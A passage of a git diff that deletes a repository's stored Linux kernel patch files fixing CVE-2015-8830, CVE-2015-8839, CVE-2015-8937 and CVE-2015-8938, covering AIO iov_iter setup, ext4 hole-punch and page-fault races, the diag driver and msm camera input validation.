-Patch calls iov_iter_advance() before goto again: we'll skip zero-length
-segment at second iteraction and iov_iter_fault_in_readable() will detect
-invalid address.
-
-Special thanks to Konstantin Khlebnikov, who helped a lot with the commit
-description.
-
-Cc: Andrew Morton <akpm@linux-foundation.org>
-Cc: Maxim Patlasov <mpatlasov@parallels.com>
-Cc: Konstantin Khlebnikov <khlebnikov@yandex-team.ru>
-Signed-off-by: Roman Gushchin <klamm@yandex-team.ru>
-Signed-off-by: Miklos Szeredi <miklos@szeredi.hu>
-Fixes: ea9b9907b82a ("fuse: implement perform_write")
-Cc: <stable@vger.kernel.org>
----
- fs/fuse/file.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/fuse/file.c b/fs/fuse/file.c
-index f523f2f..195476a 100644
---- a/fs/fuse/file.c
-+++ b/fs/fuse/file.c
-@@ -1049,6 +1049,7 @@ static ssize_t fuse_fill_write_pages(struct fuse_req *req,
- 		tmp = iov_iter_copy_from_user_atomic(page, ii, offset, bytes);
- 		flush_dcache_page(page);
- 
-+		iov_iter_advance(ii, tmp);
- 		if (!tmp) {
- 			unlock_page(page);
- 			page_cache_release(page);
-@@ -1061,7 +1062,6 @@ static ssize_t fuse_fill_write_pages(struct fuse_req *req,
- 		req->page_descs[req->num_pages].length = tmp;
- 		req->num_pages++;
- 
--		iov_iter_advance(ii, tmp);
- 		count += tmp;
- 		pos += tmp;
- 		offset += tmp;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8830/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8830/ANY/0001.patch
deleted file mode 100644
index 06b89153..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8830/ANY/0001.patch
+++ /dev/null
@@ -1,84 +0,0 @@
-From 4c185ce06dca14f5cea192f5a2c981ef50663f2b Mon Sep 17 00:00:00 2001
-From: Al Viro <viro@zeniv.linux.org.uk>
-Date: Fri, 20 Mar 2015 20:17:32 -0400
-Subject: aio: lift iov_iter_init() into aio_setup_..._rw()
-
-the only non-trivial detail is that we do it before rw_verify_area(),
-so we'd better cap the length ourselves in aio_setup_single_rw()
-case (for vectored case rw_copy_check_uvector() will do that for us).
-
-Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
----
- fs/aio.c | 17 +++++++++++------
- 1 file changed, 11 insertions(+), 6 deletions(-)
-
-diff --git a/fs/aio.c b/fs/aio.c
-index 435ca29..7816e8e 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -1357,7 +1357,8 @@ static ssize_t aio_setup_vectored_rw(struct kiocb *kiocb,
- 				     unsigned long *nr_segs,
- 				     size_t *len,
- 				     struct iovec **iovec,
--				     bool compat)
-+				     bool compat,
-+				     struct iov_iter *iter)
- {
- 	ssize_t ret;
- 
-@@ -1378,6 +1379,7 @@ static ssize_t aio_setup_vectored_rw(struct kiocb *kiocb,
- 
- 	/* len now reflect bytes instead of segs */
- 	*len = ret;
-+	iov_iter_init(iter, rw, *iovec, *nr_segs, *len);
- 	return 0;
- }
- 
-@@ -1385,14 +1387,18 @@ static ssize_t aio_setup_single_vector(struct kiocb *kiocb,
- 				       int rw, char __user *buf,
- 				       unsigned long *nr_segs,
- 				       size_t len,
--				       struct iovec *iovec)
-+				       struct iovec *iovec,
-+				       struct iov_iter *iter)
- {
-+	if (len > MAX_RW_COUNT)
-+		len = MAX_RW_COUNT;
- 	if (unlikely(!access_ok(!rw, buf, len)))
- 		return -EFAULT;
- 
- 	iovec->iov_base = buf;
- 	iovec->iov_len = len;
- 	*nr_segs = 1;
-+	iov_iter_init(iter, rw, iovec, *nr_segs, len);
- 	return 0;
- }
- 
-@@ -1438,10 +1444,10 @@ rw_common:
- 
- 		if (opcode == IOCB_CMD_PREADV || opcode == IOCB_CMD_PWRITEV)
- 			ret = aio_setup_vectored_rw(req, rw, buf, &nr_segs,
--						&len, &iovec, compat);
-+						&len, &iovec, compat, &iter);
- 		else
- 			ret = aio_setup_single_vector(req, rw, buf, &nr_segs,
--						  len, iovec);
-+						  len, iovec, &iter);
- 		if (!ret)
- 			ret = rw_verify_area(rw, file, &req->ki_pos, len);
- 		if (ret < 0) {
-@@ -1463,10 +1469,9 @@ rw_common:
- 			file_start_write(file);
- 
- 		if (iter_op) {
--			iov_iter_init(&iter, rw, iovec, nr_segs, len);
- 			ret = iter_op(req, &iter);
- 		} else {
--			ret = rw_op(req, iovec, nr_segs, req->ki_pos);
-+			ret = rw_op(req, iter.iov, iter.nr_segs, req->ki_pos);
- 		}
- 
- 		if (rw == WRITE)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8830/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2015-8830/ANY/0002.patch
deleted file mode 100644
index 7b75df93..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8830/ANY/0002.patch
+++ /dev/null
@@ -1,106 +0,0 @@
-From a70b52ec1aaeaf60f4739edb1b422827cb6f3893 Mon Sep 17 00:00:00 2001
-From: Linus Torvalds <torvalds@linux-foundation.org>
-Date: Mon, 21 May 2012 16:06:20 -0700
-Subject: vfs: make AIO use the proper rw_verify_area() area helpers
-
-We had for some reason overlooked the AIO interface, and it didn't use
-the proper rw_verify_area() helper function that checks (for example)
-mandatory locking on the file, and that the size of the access doesn't
-cause us to overflow the provided offset limits etc.
-
-Instead, AIO did just the security_file_permission() thing (that
-rw_verify_area() also does) directly.
-
-This fixes it to do all the proper helper functions, which not only
-means that now mandatory file locking works with AIO too, we can
-actually remove lines of code.
-
-Reported-by: Manish Honap <manish_honap_vit@yahoo.co.in>
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- fs/aio.c | 30 ++++++++++++++----------------
- 1 file changed, 14 insertions(+), 16 deletions(-)
-
-diff --git a/fs/aio.c b/fs/aio.c
-index 67a6db3..e7f2fad 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -1456,6 +1456,10 @@ static ssize_t aio_setup_vectored_rw(int type, struct kiocb *kiocb, bool compat)
- 	if (ret < 0)
- 		goto out;
- 
-+	ret = rw_verify_area(type, kiocb->ki_filp, &kiocb->ki_pos, ret);
-+	if (ret < 0)
-+		goto out;
-+
- 	kiocb->ki_nr_segs = kiocb->ki_nbytes;
- 	kiocb->ki_cur_seg = 0;
- 	/* ki_nbytes/left now reflect bytes instead of segs */
-@@ -1467,11 +1471,17 @@ out:
- 	return ret;
- }
- 
--static ssize_t aio_setup_single_vector(struct kiocb *kiocb)
-+static ssize_t aio_setup_single_vector(int type, struct file * file, struct kiocb *kiocb)
- {
-+	int bytes;
-+
-+	bytes = rw_verify_area(type, file, &kiocb->ki_pos, kiocb->ki_left);
-+	if (bytes < 0)
-+		return bytes;
-+
- 	kiocb->ki_iovec = &kiocb->ki_inline_vec;
- 	kiocb->ki_iovec->iov_base = kiocb->ki_buf;
--	kiocb->ki_iovec->iov_len = kiocb->ki_left;
-+	kiocb->ki_iovec->iov_len = bytes;
- 	kiocb->ki_nr_segs = 1;
- 	kiocb->ki_cur_seg = 0;
- 	return 0;
-@@ -1496,10 +1506,7 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- 		if (unlikely(!access_ok(VERIFY_WRITE, kiocb->ki_buf,
- 			kiocb->ki_left)))
- 			break;
--		ret = security_file_permission(file, MAY_READ);
--		if (unlikely(ret))
--			break;
--		ret = aio_setup_single_vector(kiocb);
-+		ret = aio_setup_single_vector(READ, file, kiocb);
- 		if (ret)
- 			break;
- 		ret = -EINVAL;
-@@ -1514,10 +1521,7 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- 		if (unlikely(!access_ok(VERIFY_READ, kiocb->ki_buf,
- 			kiocb->ki_left)))
- 			break;
--		ret = security_file_permission(file, MAY_WRITE);
--		if (unlikely(ret))
--			break;
--		ret = aio_setup_single_vector(kiocb);
-+		ret = aio_setup_single_vector(WRITE, file, kiocb);
- 		if (ret)
- 			break;
- 		ret = -EINVAL;
-@@ -1528,9 +1532,6 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- 		ret = -EBADF;
- 		if (unlikely(!(file->f_mode & FMODE_READ)))
- 			break;
--		ret = security_file_permission(file, MAY_READ);
--		if (unlikely(ret))
--			break;
- 		ret = aio_setup_vectored_rw(READ, kiocb, compat);
- 		if (ret)
- 			break;
-@@ -1542,9 +1543,6 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- 		ret = -EBADF;
- 		if (unlikely(!(file->f_mode & FMODE_WRITE)))
- 			break;
--		ret = security_file_permission(file, MAY_WRITE);
--		if (unlikely(ret))
--			break;
- 		ret = aio_setup_vectored_rw(WRITE, kiocb, compat);
- 		if (ret)
- 			break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8839/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8839/ANY/0001.patch
deleted file mode 100644
index 16b5fa3f..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8839/ANY/0001.patch
+++ /dev/null
@@ -1,442 +0,0 @@
-From ea3d7209ca01da209cda6f0dea8be9cc4b7a933b Mon Sep 17 00:00:00 2001
-From: Jan Kara <jack@suse.com>
-Date: Mon, 7 Dec 2015 14:28:03 -0500
-Subject: ext4: fix races between page faults and hole punching
-
-Currently, page faults and hole punching are completely unsynchronized.
-This can result in page fault faulting in a page into a range that we
-are punching after truncate_pagecache_range() has been called and thus
-we can end up with a page mapped to disk blocks that will be shortly
-freed. Filesystem corruption will shortly follow. Note that the same
-race is avoided for truncate by checking page fault offset against
-i_size but there isn't similar mechanism available for punching holes.
-
-Fix the problem by creating new rw semaphore i_mmap_sem in inode and
-grab it for writing over truncate, hole punching, and other functions
-removing blocks from extent tree and for read over page faults. We
-cannot easily use i_data_sem for this since that ranks below transaction
-start and we need something ranking above it so that it can be held over
-the whole truncate / hole punching operation. Also remove various
-workarounds we had in the code to reduce race window when page fault
-could have created pages with stale mapping information.
-
-Signed-off-by: Jan Kara <jack@suse.com>
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
----
- fs/ext4/ext4.h     | 10 +++++++++
- fs/ext4/extents.c  | 54 ++++++++++++++++++++++++--------------------
- fs/ext4/file.c     | 66 ++++++++++++++++++++++++++++++++++++++++++++++--------
- fs/ext4/inode.c    | 36 +++++++++++++++++++++--------
- fs/ext4/super.c    |  1 +
- fs/ext4/truncate.h |  2 ++
- 6 files changed, 127 insertions(+), 42 deletions(-)
-
-diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
-index cc7ca4e..348a5ff 100644
---- a/fs/ext4/ext4.h
-+++ b/fs/ext4/ext4.h
-@@ -910,6 +910,15 @@ struct ext4_inode_info {
- 	 * by other means, so we have i_data_sem.
- 	 */
- 	struct rw_semaphore i_data_sem;
-+	/*
-+	 * i_mmap_sem is for serializing page faults with truncate / punch hole
-+	 * operations. We have to make sure that new page cannot be faulted in
-+	 * a section of the inode that is being punched. We cannot easily use
-+	 * i_data_sem for this since we need protection for the whole punch
-+	 * operation and i_data_sem ranks below transaction start so we have
-+	 * to occasionally drop it.
-+	 */
-+	struct rw_semaphore i_mmap_sem;
- 	struct inode vfs_inode;
- 	struct jbd2_inode *jinode;
- 
-@@ -2484,6 +2493,7 @@ extern int ext4_chunk_trans_blocks(struct inode *, int nrblocks);
- extern int ext4_zero_partial_blocks(handle_t *handle, struct inode *inode,
- 			     loff_t lstart, loff_t lend);
- extern int ext4_page_mkwrite(struct vm_area_struct *vma, struct vm_fault *vmf);
-+extern int ext4_filemap_fault(struct vm_area_struct *vma, struct vm_fault *vmf);
- extern qsize_t *ext4_get_reserved_space(struct inode *inode);
- extern void ext4_da_update_reserve_space(struct inode *inode,
- 					int used, int quota_claim);
-diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
-index 551353b..5be9ca5 100644
---- a/fs/ext4/extents.c
-+++ b/fs/ext4/extents.c
-@@ -4770,7 +4770,6 @@ static long ext4_zero_range(struct file *file, loff_t offset,
- 	int partial_begin, partial_end;
- 	loff_t start, end;
- 	ext4_lblk_t lblk;
--	struct address_space *mapping = inode->i_mapping;
- 	unsigned int blkbits = inode->i_blkbits;
- 
- 	trace_ext4_zero_range(inode, offset, len, mode);
-@@ -4786,17 +4785,6 @@ static long ext4_zero_range(struct file *file, loff_t offset,
- 	}
- 
- 	/*
--	 * Write out all dirty pages to avoid race conditions
--	 * Then release them.
--	 */
--	if (mapping->nrpages && mapping_tagged(mapping, PAGECACHE_TAG_DIRTY)) {
--		ret = filemap_write_and_wait_range(mapping, offset,
--						   offset + len - 1);
--		if (ret)
--			return ret;
--	}
--
--	/*
- 	 * Round up offset. This is not fallocate, we neet to zero out
- 	 * blocks, so convert interior block aligned part of the range to
- 	 * unwritten and possibly manually zero out unaligned parts of the
-@@ -4856,16 +4844,22 @@ static long ext4_zero_range(struct file *file, loff_t offset,
- 		flags |= (EXT4_GET_BLOCKS_CONVERT_UNWRITTEN |
- 			  EXT4_EX_NOCACHE);
- 
--		/* Now release the pages and zero block aligned part of pages*/
--		truncate_pagecache_range(inode, start, end - 1);
--		inode->i_mtime = inode->i_ctime = ext4_current_time(inode);
--
- 		/* Wait all existing dio workers, newcomers will block on i_mutex */
- 		ext4_inode_block_unlocked_dio(inode);
- 		inode_dio_wait(inode);
- 
-+		/*
-+		 * Prevent page faults from reinstantiating pages we have
-+		 * released from page cache.
-+		 */
-+		down_write(&EXT4_I(inode)->i_mmap_sem);
-+		/* Now release the pages and zero block aligned part of pages */
-+		truncate_pagecache_range(inode, start, end - 1);
-+		inode->i_mtime = inode->i_ctime = ext4_current_time(inode);
-+
- 		ret = ext4_alloc_file_blocks(file, lblk, max_blocks, new_size,
- 					     flags, mode);
-+		up_write(&EXT4_I(inode)->i_mmap_sem);
- 		if (ret)
- 			goto out_dio;
- 	}
-@@ -5524,17 +5518,22 @@ int ext4_collapse_range(struct inode *inode, loff_t offset, loff_t len)
- 		goto out_mutex;
- 	}
- 
--	truncate_pagecache(inode, ioffset);
--
- 	/* Wait for existing dio to complete */
- 	ext4_inode_block_unlocked_dio(inode);
- 	inode_dio_wait(inode);
- 
-+	/*
-+	 * Prevent page faults from reinstantiating pages we have released from
-+	 * page cache.
-+	 */
-+	down_write(&EXT4_I(inode)->i_mmap_sem);
-+	truncate_pagecache(inode, ioffset);
-+
- 	credits = ext4_writepage_trans_blocks(inode);
- 	handle = ext4_journal_start(inode, EXT4_HT_TRUNCATE, credits);
- 	if (IS_ERR(handle)) {
- 		ret = PTR_ERR(handle);
--		goto out_dio;
-+		goto out_mmap;
- 	}
- 
- 	down_write(&EXT4_I(inode)->i_data_sem);
-@@ -5573,7 +5572,8 @@ int ext4_collapse_range(struct inode *inode, loff_t offset, loff_t len)
- 
- out_stop:
- 	ext4_journal_stop(handle);
--out_dio:
-+out_mmap:
-+	up_write(&EXT4_I(inode)->i_mmap_sem);
- 	ext4_inode_resume_unlocked_dio(inode);
- out_mutex:
- 	mutex_unlock(&inode->i_mutex);
-@@ -5660,17 +5660,22 @@ int ext4_insert_range(struct inode *inode, loff_t offset, loff_t len)
- 		goto out_mutex;
- 	}
- 
--	truncate_pagecache(inode, ioffset);
--
- 	/* Wait for existing dio to complete */
- 	ext4_inode_block_unlocked_dio(inode);
- 	inode_dio_wait(inode);
- 
-+	/*
-+	 * Prevent page faults from reinstantiating pages we have released from
-+	 * page cache.
-+	 */
-+	down_write(&EXT4_I(inode)->i_mmap_sem);
-+	truncate_pagecache(inode, ioffset);
-+
- 	credits = ext4_writepage_trans_blocks(inode);
- 	handle = ext4_journal_start(inode, EXT4_HT_TRUNCATE, credits);
- 	if (IS_ERR(handle)) {
- 		ret = PTR_ERR(handle);
--		goto out_dio;
-+		goto out_mmap;
- 	}
- 
- 	/* Expand file to avoid data loss if there is error while shifting */
-@@ -5741,7 +5746,8 @@ int ext4_insert_range(struct inode *inode, loff_t offset, loff_t len)
- 
- out_stop:
- 	ext4_journal_stop(handle);
--out_dio:
-+out_mmap:
-+	up_write(&EXT4_I(inode)->i_mmap_sem);
- 	ext4_inode_resume_unlocked_dio(inode);
- out_mutex:
- 	mutex_unlock(&inode->i_mutex);
-diff --git a/fs/ext4/file.c b/fs/ext4/file.c
-index 113837e..0d24ebc 100644
---- a/fs/ext4/file.c
-+++ b/fs/ext4/file.c
-@@ -209,15 +209,18 @@ static int ext4_dax_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
- {
- 	int result;
- 	handle_t *handle = NULL;
--	struct super_block *sb = file_inode(vma->vm_file)->i_sb;
-+	struct inode *inode = file_inode(vma->vm_file);
-+	struct super_block *sb = inode->i_sb;
- 	bool write = vmf->flags & FAULT_FLAG_WRITE;
- 
- 	if (write) {
- 		sb_start_pagefault(sb);
- 		file_update_time(vma->vm_file);
-+		down_read(&EXT4_I(inode)->i_mmap_sem);
- 		handle = ext4_journal_start_sb(sb, EXT4_HT_WRITE_PAGE,
- 						EXT4_DATA_TRANS_BLOCKS(sb));
--	}
-+	} else
-+		down_read(&EXT4_I(inode)->i_mmap_sem);
- 
- 	if (IS_ERR(handle))
- 		result = VM_FAULT_SIGBUS;
-@@ -228,8 +231,10 @@ static int ext4_dax_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
- 	if (write) {
- 		if (!IS_ERR(handle))
- 			ext4_journal_stop(handle);
-+		up_read(&EXT4_I(inode)->i_mmap_sem);
- 		sb_end_pagefault(sb);
--	}
-+	} else
-+		up_read(&EXT4_I(inode)->i_mmap_sem);
- 
- 	return result;
- }
-@@ -246,10 +251,12 @@ static int ext4_dax_pmd_fault(struct vm_area_struct *vma, unsigned long addr,
- 	if (write) {
- 		sb_start_pagefault(sb);
- 		file_update_time(vma->vm_file);
-+		down_read(&EXT4_I(inode)->i_mmap_sem);
- 		handle = ext4_journal_start_sb(sb, EXT4_HT_WRITE_PAGE,
- 				ext4_chunk_trans_blocks(inode,
- 							PMD_SIZE / PAGE_SIZE));
--	}
-+	} else
-+		down_read(&EXT4_I(inode)->i_mmap_sem);
- 
- 	if (IS_ERR(handle))
- 		result = VM_FAULT_SIGBUS;
-@@ -260,30 +267,71 @@ static int ext4_dax_pmd_fault(struct vm_area_struct *vma, unsigned long addr,
- 	if (write) {
- 		if (!IS_ERR(handle))
- 			ext4_journal_stop(handle);
-+		up_read(&EXT4_I(inode)->i_mmap_sem);
- 		sb_end_pagefault(sb);
--	}
-+	} else
-+		up_read(&EXT4_I(inode)->i_mmap_sem);
- 
- 	return result;
- }
- 
- static int ext4_dax_mkwrite(struct vm_area_struct *vma, struct vm_fault *vmf)
- {
--	return dax_mkwrite(vma, vmf, ext4_get_block_dax,
--				ext4_end_io_unwritten);
-+	int err;
-+	struct inode *inode = file_inode(vma->vm_file);
-+
-+	sb_start_pagefault(inode->i_sb);
-+	file_update_time(vma->vm_file);
-+	down_read(&EXT4_I(inode)->i_mmap_sem);
-+	err = __dax_mkwrite(vma, vmf, ext4_get_block_dax,
-+			    ext4_end_io_unwritten);
-+	up_read(&EXT4_I(inode)->i_mmap_sem);
-+	sb_end_pagefault(inode->i_sb);
-+
-+	return err;
-+}
-+
-+/*
-+ * Handle write fault for VM_MIXEDMAP mappings. Similarly to ext4_dax_mkwrite()
-+ * handler we check for races agaist truncate. Note that since we cycle through
-+ * i_mmap_sem, we are sure that also any hole punching that began before we
-+ * were called is finished by now and so if it included part of the file we
-+ * are working on, our pte will get unmapped and the check for pte_same() in
-+ * wp_pfn_shared() fails. Thus fault gets retried and things work out as
-+ * desired.
-+ */
-+static int ext4_dax_pfn_mkwrite(struct vm_area_struct *vma,
-+				struct vm_fault *vmf)
-+{
-+	struct inode *inode = file_inode(vma->vm_file);
-+	struct super_block *sb = inode->i_sb;
-+	int ret = VM_FAULT_NOPAGE;
-+	loff_t size;
-+
-+	sb_start_pagefault(sb);
-+	file_update_time(vma->vm_file);
-+	down_read(&EXT4_I(inode)->i_mmap_sem);
-+	size = (i_size_read(inode) + PAGE_SIZE - 1) >> PAGE_SHIFT;
-+	if (vmf->pgoff >= size)
-+		ret = VM_FAULT_SIGBUS;
-+	up_read(&EXT4_I(inode)->i_mmap_sem);
-+	sb_end_pagefault(sb);
-+
-+	return ret;
- }
- 
- static const struct vm_operations_struct ext4_dax_vm_ops = {
- 	.fault		= ext4_dax_fault,
- 	.pmd_fault	= ext4_dax_pmd_fault,
- 	.page_mkwrite	= ext4_dax_mkwrite,
--	.pfn_mkwrite	= dax_pfn_mkwrite,
-+	.pfn_mkwrite	= ext4_dax_pfn_mkwrite,
- };
- #else
- #define ext4_dax_vm_ops	ext4_file_vm_ops
- #endif
- 
- static const struct vm_operations_struct ext4_file_vm_ops = {
--	.fault		= filemap_fault,
-+	.fault		= ext4_filemap_fault,
- 	.map_pages	= filemap_map_pages,
- 	.page_mkwrite   = ext4_page_mkwrite,
- };
-diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
-index ea433a7..d1207d0 100644
---- a/fs/ext4/inode.c
-+++ b/fs/ext4/inode.c
-@@ -3623,6 +3623,15 @@ int ext4_punch_hole(struct inode *inode, loff_t offset, loff_t length)
- 
- 	}
- 
-+	/* Wait all existing dio workers, newcomers will block on i_mutex */
-+	ext4_inode_block_unlocked_dio(inode);
-+	inode_dio_wait(inode);
-+
-+	/*
-+	 * Prevent page faults from reinstantiating pages we have released from
-+	 * page cache.
-+	 */
-+	down_write(&EXT4_I(inode)->i_mmap_sem);
- 	first_block_offset = round_up(offset, sb->s_blocksize);
- 	last_block_offset = round_down((offset + length), sb->s_blocksize) - 1;
- 
-@@ -3631,10 +3640,6 @@ int ext4_punch_hole(struct inode *inode, loff_t offset, loff_t length)
- 		truncate_pagecache_range(inode, first_block_offset,
- 					 last_block_offset);
- 
--	/* Wait all existing dio workers, newcomers will block on i_mutex */
--	ext4_inode_block_unlocked_dio(inode);
--	inode_dio_wait(inode);
--
- 	if (ext4_test_inode_flag(inode, EXT4_INODE_EXTENTS))
- 		credits = ext4_writepage_trans_blocks(inode);
- 	else
-@@ -3680,16 +3685,12 @@ int ext4_punch_hole(struct inode *inode, loff_t offset, loff_t length)
- 	if (IS_SYNC(inode))
- 		ext4_handle_sync(handle);
- 
--	/* Now release the pages again to reduce race window */
--	if (last_block_offset > first_block_offset)
--		truncate_pagecache_range(inode, first_block_offset,
--					 last_block_offset);
--
- 	inode->i_mtime = inode->i_ctime = ext4_current_time(inode);
- 	ext4_mark_inode_dirty(handle, inode);
- out_stop:
- 	ext4_journal_stop(handle);
- out_dio:
-+	up_write(&EXT4_I(inode)->i_mmap_sem);
- 	ext4_inode_resume_unlocked_dio(inode);
- out_mutex:
- 	mutex_unlock(&inode->i_mutex);
-@@ -4823,6 +4824,7 @@ int ext4_setattr(struct dentry *dentry, struct iattr *attr)
- 			} else
- 				ext4_wait_for_tail_page_commit(inode);
- 		}
-+		down_write(&EXT4_I(inode)->i_mmap_sem);
- 		/*
- 		 * Truncate pagecache after we've waited for commit
- 		 * in data=journal mode to make pages freeable.
-@@ -4830,6 +4832,7 @@ int ext4_setattr(struct dentry *dentry, struct iattr *attr)
- 		truncate_pagecache(inode, inode->i_size);
- 		if (shrink)
- 			ext4_truncate(inode);
-+		up_write(&EXT4_I(inode)->i_mmap_sem);
- 	}
- 
- 	if (!rc) {
-@@ -5278,6 +5281,8 @@ int ext4_page_mkwrite(struct vm_area_struct *vma, struct vm_fault *vmf)
- 
- 	sb_start_pagefault(inode->i_sb);
- 	file_update_time(vma->vm_file);
-+
-+	down_read(&EXT4_I(inode)->i_mmap_sem);
- 	/* Delalloc case is easy... */
- 	if (test_opt(inode->i_sb, DELALLOC) &&
- 	    !ext4_should_journal_data(inode) &&
-@@ -5347,6 +5352,19 @@ retry_alloc:
- out_ret:
- 	ret = block_page_mkwrite_return(ret);
- out:
-+	up_read(&EXT4_I(inode)->i_mmap_sem);
- 	sb_end_pagefault(inode->i_sb);
- 	return ret;
- }
-+
-+int ext4_filemap_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
-+{
-+	struct inode *inode = file_inode(vma->vm_file);
-+	int err;
-+
-+	down_read(&EXT4_I(inode)->i_mmap_sem);
-+	err = filemap_fault(vma, vmf);
-+	up_read(&EXT4_I(inode)->i_mmap_sem);
-+
-+	return err;
-+}
-diff --git a/fs/ext4/super.c b/fs/ext4/super.c
-index c9ab67d..493370e 100644
---- a/fs/ext4/super.c
-+++ b/fs/ext4/super.c
-@@ -958,6 +958,7 @@ static void init_once(void *foo)
- 	INIT_LIST_HEAD(&ei->i_orphan);
- 	init_rwsem(&ei->xattr_sem);
- 	init_rwsem(&ei->i_data_sem);
-+	init_rwsem(&ei->i_mmap_sem);
- 	inode_init_once(&ei->vfs_inode);
- }
- 
-diff --git a/fs/ext4/truncate.h b/fs/ext4/truncate.h
-index 011ba66..c70d06a 100644
---- a/fs/ext4/truncate.h
-+++ b/fs/ext4/truncate.h
-@@ -10,8 +10,10 @@
-  */
- static inline void ext4_truncate_failed_write(struct inode *inode)
- {
-+	down_write(&EXT4_I(inode)->i_mmap_sem);
- 	truncate_inode_pages(inode->i_mapping, inode->i_size);
- 	ext4_truncate(inode);
-+	up_write(&EXT4_I(inode)->i_mmap_sem);
- }
- 
- /*
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8839/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2015-8839/ANY/0002.patch
deleted file mode 100644
index d3684165..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8839/ANY/0002.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From f0ac071fc6660c1d8d4b0d0dbe7642dd1274e4a5 Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers <ndesaulniers@google.com>
-Date: Mon, 18 Jul 2016 12:45:17 -0700
-Subject: [PATCH] fs: ext4: disable support for fallocate FALLOC_FL_PUNCH_HOLE
-
-Bug: 28760453
-Change-Id: I019c2de559db9e4b95860ab852211b456d78c4ca
-Signed-off-by: Nick Desaulniers <ndesaulniers@google.com>
----
- fs/ext4/inode.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
-index 589d6d3134e01..bf37388aa01b7 100644
---- a/fs/ext4/inode.c
-+++ b/fs/ext4/inode.c
-@@ -3503,6 +3503,7 @@ int ext4_can_truncate(struct inode *inode)
- 
- int ext4_punch_hole(struct inode *inode, loff_t offset, loff_t length)
- {
-+#if 0
- 	struct super_block *sb = inode->i_sb;
- 	ext4_lblk_t first_block, stop_block;
- 	struct address_space *mapping = inode->i_mapping;
-@@ -3626,6 +3627,12 @@ int ext4_punch_hole(struct inode *inode, loff_t offset, loff_t length)
- out_mutex:
- 	mutex_unlock(&inode->i_mutex);
- 	return ret;
-+#else
-+	/*
-+	 * Disabled as per b/28760453
-+	 */
-+	return -EOPNOTSUPP;
-+#endif
- }
- 
- int ext4_inode_attach_jinode(struct inode *inode)
diff --git a/Patches/Linux_CVEs/CVE-2015-8937/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8937/ANY/0001.patch
deleted file mode 100644
index 65ec4018..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8937/ANY/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From c66202b9288cc4ab1c38f7c928fa1005c285c170 Mon Sep 17 00:00:00 2001
-From: Ravi Aravamudhan <aravamud@codeaurora.org>
-Date: Wed, 11 Feb 2015 17:21:11 -0800
-Subject: diag: Make fixes to diag_switch_logging
-
-Diag driver holds on to the socket process task structure even
-after signaling the process to exit. This patch clears the internal
-handle after signaling.
-
-Change-Id: I642fb595fc2caebc6f2f5419efed4fb560e4e4db
-Signed-off-by: Ravi Aravamudhan <aravamud@codeaurora.org>
----
- drivers/char/diag/diagchar_core.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 331ed97..b8343c3 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2015, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -930,6 +930,7 @@ static int diag_switch_logging(int requested_mode)
- 				pr_err("socket process, status: %d\n",
- 					status);
- 			}
-+			driver->socket_process = NULL;
- 		}
- 	} else if (driver->logging_mode == SOCKET_MODE) {
- 		driver->socket_process = current;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8938/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8938/ANY/0001.patch
deleted file mode 100644
index 8eae46ad..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8938/ANY/0001.patch
+++ /dev/null
@@ -1,255 +0,0 @@
-From 51c39420e3a49d1a7f05a77c64369b7623088238 Mon Sep 17 00:00:00 2001
-From: Sreesudhan Ramakrish Ramkumar <srramku@codeaurora.org>
-Date: Fri, 12 Dec 2014 04:20:59 -0800
-Subject: msm: camera: isp: Validate input parameter for vfe_write and vfe_read
-
-Validate input parameters for read and write operations in vfe to
-ensure operations are performed within vfe register boundary and
-within structure limits passed by caller.
-
-Change-Id: If3719de65b32773c2b6ff904da76a951dbfb11eb
-Signed-off-by: Sreesudhan Ramakrish Ramkumar <srramku@codeaurora.org>
----
- .../platform/msm/camera_v2/isp/msm_isp_util.c      | 126 +++++++++++++--------
